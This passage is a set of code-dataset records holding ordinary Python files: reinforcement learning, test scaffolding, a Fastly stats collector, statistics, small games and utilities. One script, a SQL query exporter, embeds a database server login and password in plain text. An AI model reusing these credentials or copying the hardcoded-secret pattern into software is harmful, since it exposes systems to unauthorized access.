GAMMA * np.max(q_value_batch[i]))\n\n self.opt.run(feed_dict={\n self.y_input: y_batch, self.action_input: action_batch, self.state_input: state_batch})\n\n def egreedy_action(self, state):\n # for training\n q_value = self.q_value.eval(feed_dict={self.state_input: [state]})[0] # [state] adds a batch dimension; [0] strips it from the result\n if random.random() < self.epsilon:\n return random.randint(0, self.action_dim - 1)\n else:\n return np.argmax(q_value)\n\n def action(self, state):\n # for testing\n return np.argmax(self.q_value.eval(feed_dict={\n self.state_input: [state]\n })[0])\n\n\ndef main():\n env = gym.make(ENV_NAME)\n agent = DQN(env)\n\n for episode in range(EPISODE):\n state = env.reset()\n for step in range(STEP):\n action = agent.egreedy_action(state)\n next_state, reward, done, _ = env.step(action)\n\n reward_agent = -1 if done else 0.1 # shaped reward: -1 on failure, small bonus per surviving step\n agent.perceive(state, action, reward_agent, next_state, done)\n state = next_state\n if done:\n break\n\nif __name__ == '__main__':\n main()","sub_path":"cartpole/dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"641277301","text":"#!/usr/bin/env python\n\nimport sys\nimport logging\nimport time\nimport os\n\nfrom mock import MagicMock\n\nfrom tornado.ioloop import IOLoop\nfrom tornado.testing import AsyncHTTPTestCase\nfrom tornado.web import Application\n\nfrom app.lib.mock import set_mock_data\nfrom app.lib.route import get_routes\nfrom app.config import config\n\n\nlog = logging.getLogger(__name__)\n\n\nclass BaseTest(AsyncHTTPTestCase):\n \"\"\" Base class for all functional tests \"\"\"\n\n def wait_until_active(self, t=30):\n if 'mock_data' in config:\n return\n else:\n time.sleep(t)\n\n def setUp(self):\n super(BaseTest, self).setUp()\n self.test_token = \"{0}\".format(config['test_token'])\n\n def get_method(self, url):\n return self.fetch(\n url,\n method=\"GET\",\n headers={\n \"Content-Type\": \"application/json\",\n \"X-Auth-Token\": self.test_token\n }\n )\n\n def fetch(self, path, **kwargs):\n response = AsyncHTTPTestCase.fetch(self, path, **kwargs)\n if response.body is not None:\n response.value = response.body.decode('utf-8')\n return response\n\n def 
get_app(self):\n # setup the application\n log.info(\"Starting the application\")\n routes = get_routes(os.path.dirname(__file__), \"app\")\n\n app = Application(routes)\n\n return app\n\n @classmethod\n def setUpClass(cls):\n # call the superclass version of this\n super(BaseTest, cls).setUpClass()\n config.load_file('ops/config.yaml')\n if(\"-m\" in sys.argv or \"--mock\" in sys.argv):\n set_mock_data()\n\n\nclass AsyncMagicMock(MagicMock):\n \"\"\" This is for using MagicMock with gen.Task in Tornado \"\"\"\n\n def __call__(self, *args, **kwargs):\n \"\"\"\n Handle this MagicMock as a normal MagicMock unless an Async\n (gen.Task) calls it asking for a callback to happen\n \"\"\"\n # Call the super class and get the results, pickup after this\n # pylint: disable=E1003\n results = super(MagicMock, self).__call__(*args, **kwargs)\n\n # gen.Task call\n if \"callback\" in kwargs:\n kwargs[\"callback\"](results)\n # Standard call\n else:\n return results\n","sub_path":"test/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"569333309","text":"\"\"\"\nfastly_slurper.slurper\n~~~~~~~~~~~~~~~~~~~~~~\n\n:copyright: (c) 2015 Disqus, Inc.\n:license: Apache, see LICENSE for more details.\n\"\"\"\nimport sys\nimport threading\nfrom time import time, sleep\nfrom datetime import datetime\nfrom os.path import join\n\nimport requests\nfrom pystatsd import Client as StatsdClient\n\n\nclass Statsd(StatsdClient):\n def __init__(self, address=('localhost', 8125), prefix=None, verbose=True):\n self.verbose = verbose\n super(Statsd, self).__init__(address[0], address[1], prefix)\n\n def timing(self, stat, time):\n self._log('timing', stat, time)\n super(Statsd, self).timing(stat, time)\n\n def gauge(self, stat, time):\n self._log('gauge', stat, time)\n super(Statsd, self).gauge(stat, time)\n\n def _log(self, type, stat, value):\n if self.verbose:\n sys.stderr.write(\n '{now} [{type}] {stat} {value}\\n'.format(\n now=datetime.now(), type=type,\n stat=stat if self.prefix is None else '.'.join((self.prefix, stat)),\n value=value,\n )\n )\n\n\nclass Fastly(requests.Session):\n base = 'https://rt.fastly.com/'\n user_agent = 'fastly-slurper/1.0'\n\n def __init__(self, api_key):\n super(Fastly, self).__init__()\n\n self.headers.update({\n 'Fastly-Key': api_key,\n 'User-Agent': self.user_agent,\n })\n\n def request(self, method, url, **kwargs):\n return super(Fastly, self).request(method=method, url=self.base+url, **kwargs)\n\n\nclass RecorderWorker(threading.Thread):\n def __init__(self, client, publisher, service, delay=1.0):\n super(RecorderWorker, self).__init__()\n self.daemon = True\n\n self.client = client\n self.publisher = publisher\n self.name, self.channel = service\n self.delay = delay\n\n def timing(self, stat, time):\n self.publisher.timing(self.name + '.' + stat, time)\n\n def gauge(self, stat, time):\n self.publisher.gauge(self.name + '.' 
+ stat, time)\n\n def url_for_timestamp(self, ts):\n # Convert timestamp to str and remove the decimal\n strts = ('%.9f' % ts).translate(None, '.')\n return join('channel', self.channel, 'ts', strts)\n\n def get_stats(self, ts):\n response = self.client.get(self.url_for_timestamp(ts)).json()\n return response['Data']\n\n def record_stats(self, message):\n for stats in message:\n if 'datacenter' in stats:\n for dc, dcstats in stats['datacenter'].iteritems():\n for stat, val in dcstats.iteritems():\n if stat == 'miss_histogram':\n continue\n\n if stat.endswith('_time'):\n t = stat.split('_')[0]\n if dcstats[t]:\n val = val / dcstats[t] * 1000\n\n stat_name = '%s.%s' % (dc, stat)\n self.timing(stat_name, val)\n\n self.gauge('last_record', int(time()))\n\n def run(self):\n while True:\n try:\n self.record_stats(self.get_stats(time()))\n except Exception:\n import traceback\n traceback.print_exc(file=sys.stderr)\n sleep(self.delay)\n","sub_path":"fastly_slurper/slurper.py","file_name":"slurper.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"646042508","text":"import numpy as np\n\nclass MNPrior:\n\tdef __init__(self, data, AR, lags, params=[0.2,0.5,2.0,1e5]):\n\t\tself.T, self.n_vars = data.shape\n\t\tself.AR = AR\n\t\tself.hparam1 = params[0]\n\t\tself.hparam2 = params[1]\n\t\tself.hparam3 = params[2]\n\t\tself.hparam4 = params[3]\n\n\t\tself.compute(data, lags)\n\n\tdef compute(self, data, lags):\n\t\tif self.AR:\n\t\t\trho = np.asarray(self.AR)\n\t\telse:\n\t\t\trho = np.ones(self.n_vars, order='F')\n\n\t\tse = np.zeros(self.n_vars, order='F')\n\n\t\t# Estimate error variances from OLS residuals\n\t\tfor ivar in range(self.n_vars):\n\t\t\ty = data[1:self.T,ivar]\n\t\t\tx_noconst = data[0:self.T-1,ivar].reshape((-1,1), order='F')\n\t\t\tconst = np.ones((self.T-1,1), order='F')\n\t\t\tx = np.concatenate((const,x_noconst), axis=1)\n\t\t\tb = np.linalg.lstsq(x, y, rcond=None)[0]\n\t\t\tu = y - np.matmul(x, b)\n\t\t\tse[ivar] = np.sqrt(u.dot(u) / (y.shape[0]-2))\n\n\t\t# Set coefficient means\n\t\tself.coeff_mean = np.zeros((lags,self.n_vars,self.n_vars), order='F')\n\t\tlag = 1\n\t\tfor ivar in range(self.n_vars):\n\t\t\tself.coeff_mean[lag-1,ivar,ivar] = rho[ivar]\n\n\t\t# Set coefficient variances\n\t\tself.coeff_var = np.zeros((lags,self.n_vars,self.n_vars), order='F')\n\t\tfor lag in range(1, lags+1):\n\t\t\tfor ivar in range(self.n_vars):\n\t\t\t\tfor jvar in range(self.n_vars):\n\t\t\t\t\tif ivar == jvar:\n\t\t\t\t\t\ttmp = self.hparam1 / (lag ** self.hparam3)\n\t\t\t\t\telse:\n\t\t\t\t\t\ttmp_denom = se[jvar] * lag ** self.hparam3\n\t\t\t\t\t\ttmp_num = se[ivar] * self.hparam1 * self.hparam2\n\t\t\t\t\t\ttmp = tmp_num / tmp_denom\n\t\t\t\t\tself.coeff_var[lag-1,ivar,jvar] = tmp * tmp\n\n\t\t# Set constant variances\n\t\tself.const_var = np.zeros(self.n_vars, order='F')\n\t\tfor ivar in range(self.n_vars):\n\t\t\ttmp = se[ivar] * self.hparam4\n\t\t\tself.const_var[ivar] = tmp * tmp\n\n\t\t# Create matrix of all means\n\t\tself.means = np.zeros((lags*self.n_vars+1, self.n_vars), order='F')\n\t\ttmp = np.transpose(self.coeff_mean, (2,0,1))\n\t\ttmp = np.reshape(tmp, (lags*self.n_vars, self.n_vars), order='F')\n\t\tself.means[:-1,:] = tmp\n\t\tself.means = self.means.reshape((-1,1), order='F')\n\t\t\n\t\t# Create matrix of all variances\n\t\tself.variances = np.zeros((lags*self.n_vars+1, self.n_vars), order='F')\n\t\ttmp = np.transpose(self.coeff_var, (2,0,1))\n\t\ttmp = np.reshape(tmp, 
(lags*self.n_vars, self.n_vars), order='F')\n\t\tself.variances[:-1,:] = tmp\n\t\tself.variances[-1,:] = self.const_var\n\t\tself.variances = np.diagflat(self.variances.reshape((-1,1), order='F'))\n\n\n\t\t# WHAT IS THIS???\n\t\tself.gamma = np.eye(self.n_vars, order='F')\n\n\t\tn_stacked = self.n_vars * (self.n_vars * lags + 1)\n\t\ttmp = np.eye(n_stacked, order='F')\n\n\t\tself.inv_variances = np.linalg.lstsq(self.variances, tmp, rcond=None)[0]\n\t\t# self.coeff_var_inv = np.linalg.inv(self.coeff_var)\n","sub_path":"code/MNPrior.py","file_name":"MNPrior.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"183142105","text":"#encoding: UTF-8\n#Author: Jesús Perea\n#Roman Numerals\n\n#start\n\ndef convertirARomano(numero): #Converts the given number into a Roman numeral\n if numero >= 1 and numero <= 10:\n if numero == 1:\n romano = \"I\"\n elif numero == 2:\n romano = \"II\"\n elif numero == 3:\n romano = \"III\"\n elif numero == 4:\n romano = \"IV\"\n elif numero == 5:\n romano = \"V\"\n elif numero == 6:\n romano = \"VI\"\n elif numero == 7:\n romano = \"VII\"\n elif numero == 8:\n romano = \"VIII\"\n elif numero == 9:\n romano = \"IX\"\n else:\n romano = \"X\"\n return romano\n else: \n error = \"Error. Enter a valid number\"\n return error\n \ndef main(): \n numeroEntero = int(input(\"Enter the number between 1 and 10 that you want to convert to a Roman numeral\"))\n numeroRomano = convertirARomano(numeroEntero)\n print (numeroRomano) \n\n\nmain()","sub_path":"Numero_Romano.py","file_name":"Numero_Romano.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"448832791","text":"__author__ = 'as117001364'\nimport pygame\nfrom pygame.locals import *\n\npygame.init()\npygame.display.set_caption(\"Space Shooter\")\nscreen = pygame.display.set_mode((800, 600))\npygame.mouse.set_visible(0)\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.image.load('resources/hotshotgg.png')\n self.rect = self.image.get_rect()\n self.x = x\n self.y = y\n self.dx = 0\n self.dy = 0\n\n def moveX(self, vel):\n self.dx = vel\n\n def moveY(self, vel):\n self.dy = vel\n\n def update(self):\n self.x += self.dx\n self.y += self.dy\n\n self.rect.x = self.x\n self.rect.y = self.y\n\n\n\ndef main():\n global player\n player = Player(50, 50)\n\n playerSprite = pygame.sprite.RenderPlain()\n playerSprite.add(player)\n\n #Set Clock\n clock = pygame.time.Clock()\n keepGoing = True\n counter = 0\n\n #Main Loop\n while keepGoing:\n clock.tick(30)\n #input\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n keepGoing = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n player.moveX(-2)\n elif event.key == pygame.K_RIGHT:\n player.moveX(2)\n elif event.key == pygame.K_UP:\n player.moveY(-2)\n elif event.key == pygame.K_DOWN:\n player.moveY(2)\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n player.moveX(0)\n elif event.key == pygame.K_RIGHT:\n player.moveX(0)\n elif event.key == pygame.K_UP:\n player.moveY(0)\n elif event.key == pygame.K_DOWN:\n player.moveY(0)\n screen.fill((255,255,255))\n playerSprite.update()\n playerSprite.draw(screen)\n pygame.display.update()\n\nif __name__ == '__main__':\n 
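# 30 FPS loop: arrow keys set the sprite velocity; expects resources/hotshotgg.png on disk\n 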
main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"217493414","text":"import pymssql\n\n\"\"\"Instructions: In a new python script write the following at the top:\n\nfrom query import *\n\nAnd the use the execute_to_csv function like you normally do.\n\"\"\"\n\ndef execute_to_csv(query, filename):\n con = pymssql.connect(server='thales-mathsys1.database.windows.net', user='ayman-admin@thales-mathsys1', password='fb1123581321&', database='thales')\n with con:\n cur = con.cursor()\n cur.execute(query)\n row = cur.fetchone()\n with open(filename, 'w') as f:\n f.write(\"link_id, link_type, link_length, link_direction, link_location, from_node, to_node, from_lat, from_lon, to_lat, to_lon\\n\")\n while row:\n row = [str(r) for r in row]\n entry = \", \".join(row)+\"\\n\"\n f.write(entry)\n row = cur.fetchone()\n\ndef main():\n qry = \"SELECT L.*, NF.node_lat AS from_lat, NF.node_lon AS from_lon, NT.node_lat AS to_lat, NT.node_lon AS to_lon FROM\"\n qry = qry + \" (SELECT * FROM links WHERE link_id IN (SELECT DISTINCT link_id FROM m11_travel_time)) AS L \"\n qry = qry + \" LEFT JOIN (SELECT * FROM nodes) AS NF\"\n qry = qry + \" ON L.from_node = NF.node_id\"\n qry = qry + \" LEFT JOIN (SELECT * FROM nodes) AS NT\"\n qry = qry + \" ON L.to_node = NT.node_id\"\n execute_to_csv(qry, \"m11_links.csv\")\n\nif __name__ == '__main__':\n main()\n","sub_path":"00_Data/00_Data_acquisition(HE_cloud_SQL_CSV)/F. Creating queries to download CSV files/QUERY_PRINT_LINKS.py","file_name":"QUERY_PRINT_LINKS.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357422900","text":"import numpy as np\nfrom skimage.measure import label\n\nfrom .itertools import negate_indices\nfrom .axes import AxesLike, check_axes\n\nfrom .shape_ops import *\n\n\n# TODO: docstring\ndef normalize(x: np.ndarray, mean: bool = True, std: bool = True, percentiles: AxesLike = None,\n axes: AxesLike = None) -> np.ndarray:\n \"\"\"\n Normalize ``x``'s values to make mean and std independently along ``axes`` equal to 0 and 1 respectively\n (if specified).\n \"\"\"\n if axes is not None:\n axes = tuple(negate_indices(check_axes(axes), x.ndim))\n\n robust_values = x\n if percentiles is not None:\n if np.size(percentiles) == 1:\n percentiles = [percentiles, 100 - percentiles]\n\n bottom, top = np.percentile(x, percentiles, axes, keepdims=True)\n mask = (x < bottom) | (x >= top)\n robust_values = np.ma.masked_array(x, mask=mask)\n\n if mean:\n x = x - robust_values.mean(axes, keepdims=True)\n if std:\n x = x / robust_values.std(axes, keepdims=True)\n\n return x\n\n\ndef min_max_scale(x: np.ndarray, axes: AxesLike = None) -> np.ndarray:\n \"\"\"Scale ``x``'s values so that its minimum and maximum become 0 and 1 respectively\n independently along ``axes``.\"\"\"\n if axes is not None:\n axes = tuple(negate_indices(check_axes(axes), x.ndim))\n\n x_min, x_max = x.min(axis=axes, keepdims=True), x.max(axis=axes, keepdims=True)\n return (x - x_min) / (x_max - x_min)\n\n\ndef bytescale(x: np.ndarray) -> np.ndarray:\n \"\"\"\n Scales ``x``'s values so that its minimum and maximum become 0 and 255 respectively.\n Afterwards converts it to ``uint8``.\n \"\"\"\n return np.uint8(np.round(255 * min_max_scale(x)))\n\n\ndef describe_connected_components(mask: np.ndarray, background: int = 0, drop_background: bool = True):\n 
\"\"\"\n Get the connected components of ``mask`` as well as their labels and volumes.\n\n Parameters\n ----------\n mask\n background\n the label of the background. The pixels with this label will be marked as the background component\n (even if it is not connected).\n drop_background:\n whether to exclude the background from the returned components' descriptions.\n\n Returns\n -------\n labeled_mask\n array of the same shape as ``mask``.\n labels\n a list of labels from the ``labeled_mask``. The background label is always 0.\n The labels are sorted according to their corresponding volumes.\n volumes\n a list of corresponding labels' volumes.\n \"\"\"\n label_map = label(mask, background=background)\n labels, volumes = np.unique(label_map, return_counts=True)\n idx = volumes.argsort()[::-1]\n labels, volumes = labels[idx], volumes[idx]\n if drop_background:\n foreground = labels != 0\n labels, volumes = labels[foreground], volumes[foreground]\n return label_map, labels, volumes\n\n\ndef get_greatest_component(mask: np.ndarray, background: int = 0, drop_background: bool = True) -> np.ndarray:\n \"\"\"Get the greatest connected component from ``mask``. See `describe_connected_components` for details.\"\"\"\n label_map, labels, volumes = describe_connected_components(mask, background, drop_background)\n return label_map == labels[0]\n\n\n# 27.07.2019\n@np.deprecate(new_name='normalize')\ndef normalize_image(image: np.ndarray, mean: bool = True, std: bool = True, drop_percentile: int = None) -> np.ndarray:\n return normalize(image, mean, std, drop_percentile)\n\n\n@np.deprecate(new_name='normalize')\ndef normalize_multichannel_image(image: np.ndarray, mean: bool = True, std: bool = True, drop_percentile: int = None):\n return normalize(image, mean, std, drop_percentile, 0)\n","sub_path":"dpipe/medim/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"547333493","text":"from django.urls import path, include\nfrom . 
import views\n\nurlpatterns = [\n path('create/', views.create_teacher, name=\"create-teacher\"),\n path('list/', views.teacher_list, name=\"teacher-list\"),\n\t\n path('edit/<int:teacher_id>', views.edit_teacher, name=\"edit-teacher\"),\n\t\n path('delete/<int:teacher_id>', views.delete_teacher, name=\"delete-teacher\"),\n path('post-list/', views.post_list, name='post-list'),\n path('search/', views.search_teacher, name=\"search-teacher\"),\n\n]\n","sub_path":"Online Result/teacher/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"394721648","text":"#!/usr/bin/python3\n\n# Prints unique entries of messages matching the target code\nimport sys\nimport os\nimport glob\nimport argparse\n\n# Global binary locations\nbinDir = \"../bin/\"\nlogDir = \"../logs/\"\n\n# Setup argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-s\",\"--sort\",action=\"store_true\",help=\"Flag to enable sorting of output.\")\nparser.add_argument(\"target_code\",nargs='?',default=None,help=\"Used to restrict output to that of a certain message code.\")\nargs = parser.parse_args()\n\n# Get most recent log file\n# Get all .log files in logDir\nlist_of_files = glob.glob(logDir + \"*.log\")\n# Get the latest file\nlatest_file = max(list_of_files, key=os.path.getctime)\n# Open and read contents of the latest log file\nfS = open(latest_file)\ndata = fS.read().strip().split(\"\\n\")\nfS.close()\n\n# Contains the unique entries\ncodes = []\n# Flagged True by lack of a <CODE>\nshowAll = False\n\n# Get the code we are looking for\nif args.target_code is None:\n\tshowAll = True\nelse:\n\ttarget = args.target_code\n\n\nfor i in data:\n\tif showAll or (i.lstrip().split(\" \")[1] == target):\n\t\tif i.lstrip().strip() not in codes:\n\t\t\tcodes.append(i.lstrip().strip())\n\n# Sort codes if necessary\nif args.sort:\n\tcodes.sort()\n# Output\nprint(\"\\n\".join(codes))\n","sub_path":"analysis/log_extraction/list_unique.py","file_name":"list_unique.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"312875239","text":"import requests\nimport string\npunc = string.punctuation\nbook = requests.get('http://www.gutenberg.org/files/42108/42108-0.txt')\nbook = book.text\nfor x in book:\n if x in punc:\n book = book.replace(x,'')\nbook = book.lower()\nbook = book.split(' ')\nword_count = {}\n\n\n\nfor word in book:\n if word: # skip the empty strings left by consecutive spaces\n if word not in word_count:\n word_count[word] = 0\n word_count[word] += 1\n\nwords = list(word_count.items()) # .items() returns a list of tuples\nwords.sort(key=lambda tup: tup[1], reverse=True) # sort largest to smallest, based on count\n\nfor i in range(min(10, len(words))): # print the top 10 words, or all of them, whichever is smaller\n print(words[i])","sub_path":"Students/Sean/python/Lab15_optionals.py","file_name":"Lab15_optionals.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"348087487","text":"import sys\nfrom pycontrol import conf\nsys.path.append(conf.pangolin_build_src)\n\nimport pypangolin as pango\nfrom pycontrol import mat\nfrom OpenGL.GL import *\nimport numpy as np\nimport time\n\n\ngroundtruth_file = './data/groundtruth.txt'\nestimated_file = './data/estimated.txt'\nposes = []\n\n\ndef DrawTrajectory(groundtruth, estimated):\n 
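# draw both trajectories as poly-lines in a Pangolin 3D view: ground truth\n # in green, the estimate in red, one segment per consecutive pose pair\n 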
pango.CreateWindowAndBind(\"trajectory viewer\", 1024, 768)\n glEnable(GL_DEPTH_TEST)\n glEnable(GL_BLEND)\n glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)\n\n pm = pango.ProjectionMatrix(1024, 768, 500, 500, 512, 389, 0.1, 1000)\n mv = pango.ModelViewLookAt(0, -0.1, -1.8, 0, 0, 0, 0.0, -1.0, 0.0)\n s_cam = pango.OpenGlRenderState(pm, mv)\n\n handler = pango.Handler3D(s_cam)\n d_cam = pango.CreateDisplay()\n d_cam.SetBounds(pango.Attach(0.0), pango.Attach(1.0),\n pango.Attach(0.0), pango.Attach(1.0),\n -1024/768)\n d_cam.SetHandler(handler)\n\n while not pango.ShouldQuit():\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n d_cam.Activate(s_cam)\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glLineWidth(2)\n\n for i in range(len(groundtruth)-1):\n glColor3f(0.0, 1.0, 0.0)\n glBegin(GL_LINES)\n\n SE3_p1 = groundtruth[i]\n SE3_p2 = groundtruth[i+1]\n glVertex3d(SE3_p1[0], SE3_p1[1], SE3_p1[2])\n glVertex3d(SE3_p2[0], SE3_p2[1], SE3_p2[2])\n glEnd()\n\n for i in range(len(estimated)-1):\n glColor3f(1.0, 0.0, 0.0)\n glBegin(GL_LINES)\n\n SE3_p1 = estimated[i]\n SE3_p2 = estimated[i + 1]\n glVertex3d(SE3_p1[0], SE3_p1[1], SE3_p1[2])\n glVertex3d(SE3_p2[0], SE3_p2[1], SE3_p2[2])\n glEnd()\n\n pango.FinishFrame()\n time.sleep(0.005)\n\n\n\ndef read_file(filename):\n trajectory = []\n with open(filename, 'r') as f:\n for l in f.readlines():\n l = l.split()\n _time = l[0]\n tx, ty, tz, qx, qy, qz, qw = map(float, l[1:])\n q = np.array([qw, qx, qy, qz])\n t = np.array([tx, ty, tz])\n SE3 = mat.SE3_qt(q, t)\n trajectory.append(SE3)\n\n return np.array(trajectory)\n\n\n\nif __name__ == '__main__':\n groundtruth = read_file(groundtruth_file)\n estimated = read_file(estimated_file)\n assert(len(groundtruth)!=0 and len(estimated)!=0)\n assert(len(groundtruth) == len(estimated))\n\n rmse = 0\n for i in range(len(estimated)):\n SE3_p1 = estimated[i]\n SE3_p2 = groundtruth[i]\n\n p2_inv = mat.SE3_inverse(SE3_p2)\n temp1 = mat.SE3_mul_SE3(p2_inv, SE3_p1)\n temp2 = mat.SE3_log(temp1)\n error = np.sqrt(np.sum(np.power(temp2, 2)))\n rmse += error ** 2\n\n rmse = rmse / len(estimated)\n rmse = np.sqrt(rmse)\n\n print(\"RMSE = \", rmse)\n\n DrawTrajectory(groundtruth, estimated)\n","sub_path":"docs/matrix/trajectoryError.py","file_name":"trajectoryError.py","file_ext":"py","file_size_in_byte":2888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"324246785","text":"import random\nimport numpy as np\nimport os\nimport torch\n\nfrom .train import Actor\n\nSEED = 65537\nDEVICE = torch.device(\"cpu\")\ntorch.manual_seed(SEED)\n\n\nclass Agent:\n def __init__(self):\n self.model = Actor(26, 6)\n self.model.load_state_dict(torch.load(__file__[:-8] + \"/agent.pt\", map_location=DEVICE))\n self.model = self.model.to(DEVICE)\n self.model.eval()\n\n def act(self, state):\n with torch.no_grad():\n state = torch.unsqueeze(torch.tensor(np.array(state)).float(), 0).to(DEVICE)\n action, _, _ = self.model.act(state)\n return action[0].numpy()\n\n def reset(self):\n pass\n","sub_path":"src/hw3/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"317879611","text":"#!/usr/bin/env python3\n\nN, A, B, C, D = map(int, input().split())\nS = input()\n\n#hunuke\n\nh = S[A-1:D+1].count('##')\nm3 = S[B-2:D+1].count('...')\n\nif C < D:\n if h == 0: print('Yes')\n else: print('No')\nelse:\n if m3 != 0 and h == 0:\n print('Yes')\n else: print('No')\n 
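# a '##' pair anywhere on the course blocks the hop; when C > D the piece from A\n# must overtake the one from B, which needs a '...' window inside S[B-2:D+1]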
\n","sub_path":"Cer0un0/agc034/a/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"626096779","text":"from __future__ import absolute_import\nfrom .six import string_types\n\ndef load_hdf5(filename_or_buffer, autoconvert=True, restype=None, top=None):\n \"\"\"\"load hd5f format from openmm (?)\n\n Parameters\n ---------\n filename_or_buffer : str or buffer\n autoconvert : bool\n if 'True' (default): convert from `nm` to `angstrom`\n if 'False': No convert\n\n Examples\n -------\n from mdtraj.testing import get_fn\n fname = get_fn(\"frame0.h5\")\n import pytraj.io as io\n traj = io.load_hdf5(fname, autoconvert=False)\n print (traj)\n \"\"\"\n\n try:\n import h5py\n except ImportError:\n raise ImportError(\"require h5py, HDF5 lib and numpy\")\n\n if isinstance(filename_or_buffer, string_types):\n fh = h5py.File(filename_or_buffer, 'r')\n should_be_closed = True\n else:\n fh = filename_or_buffer\n should_be_closed = False\n\n traj = _load_hdf5_from_buffer(fh, autoconvert=autoconvert, restype=restype, top=top)\n\n if should_be_closed:\n fh.close()\n\n return traj\n\ndef _load_hdf5_from_buffer(fh, autoconvert=True, restype=None, top=None):\n import json\n from ..Topology import Topology\n from ..Trajectory import Trajectory\n from ..core import Atom, Box\n from ..core import mass_atomic_number_dict, mass_element_dict\n # NOTE: always use `np.float64` in pytraj\n if autoconvert:\n UNIT = 10.\n else:\n UNIT = 1.\n\n try:\n import h5py\n import numpy as np\n except ImportError:\n raise ImportError(\"require h5py, HDF5 lib and numpy\")\n\n try:\n cell_lengths = fh['cell_lengths'].value * UNIT\n box_arr = np.hstack((cell_lengths, fh['cell_angles'])).astype(np.float64)\n has_box = True\n except:\n has_box = False\n\n crd = fh['coordinates'].value.astype(np.float64)\n n_frames, n_atoms, _ = crd.shape\n if autoconvert:\n crd = crd * UNIT\n\n if restype is None:\n farray = Trajectory()\n farray._allocate(n_frames, n_atoms)\n elif restype == 'api.Trajectory':\n from pytraj import api\n farray = api.Trajectory()\n\n # create Topology\n if top is not None:\n _top = top\n else:\n top_txt = fh['topology']\n h5_topology = json.loads(top_txt.value.tostring().decode())\n _top = Topology()\n for chain in h5_topology['chains']:\n _top.start_new_mol()\n for residue in chain['residues']:\n resname = residue['name']\n resid = residue['index']\n for atom in residue['atoms']:\n aname = atom['name']\n atype = aname # no infor about atom type in .h5 file from openmm (?)\n try:\n charge = atom['charge']\n except:\n charge = 0.0\n try:\n mass = atom['mass']\n except:\n try:\n mass = mass_element_dict[atom['element']]\n except:\n try:\n mass = mass_atomic_number_dict[atom['atomic_number']]\n except:\n mass = 1.0\n atom = Atom(aname, atype, charge, mass)\n _top.add_atom(atom=atom, resid=resid, resname=resname)\n # add bonds\n # Note: no PBC info for top\n _top.add_bonds(np.asarray(h5_topology['bonds']))\n # naively assigne box info from 1st frame\n if has_box:\n _top.box = Box(box_arr[0])\n farray.top = _top\n\n # update coords\n if restype is None:\n farray.update_xyz(crd)\n if has_box:\n for idx, arr in enumerate(crd):\n farray[idx].box = box_arr[idx] # auto-cast\n else:\n farray.xyz = crd\n\n return 
farray\n","sub_path":"pytraj/externals/_load_HDF5.py","file_name":"_load_HDF5.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"310405839","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', 'app.views.home', name='home'),\n url(r'^new/$', 'app.views.new', name='new'),\n url(r'^save/$', 'app.views.save', name='save'),\n url(r'^validate/$', 'app.views.validate', name='validate'),\n url(r'^add/$', 'app.views.add', name='add'),\n url(r'^manifest.webapp$', 'app.views.manifest', name='manifest'),\n url(r'^robots.txt$', 'app.views.robots', name='robots'),\n url(r'^admin/', include(admin.site.urls)),\n)\n\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"291439823","text":"# FizzBuzz\n\ndef main():\n\n n = int(input('Enter a number: '))\n\n if n % 15 == 0:\n print('FizzBuzz')\n elif n % 3 == 0:\n print('Fizz')\n elif n % 5 == 0:\n print('Buzz')\n else:\n print('Your number is not divisasble by 3, 5, or 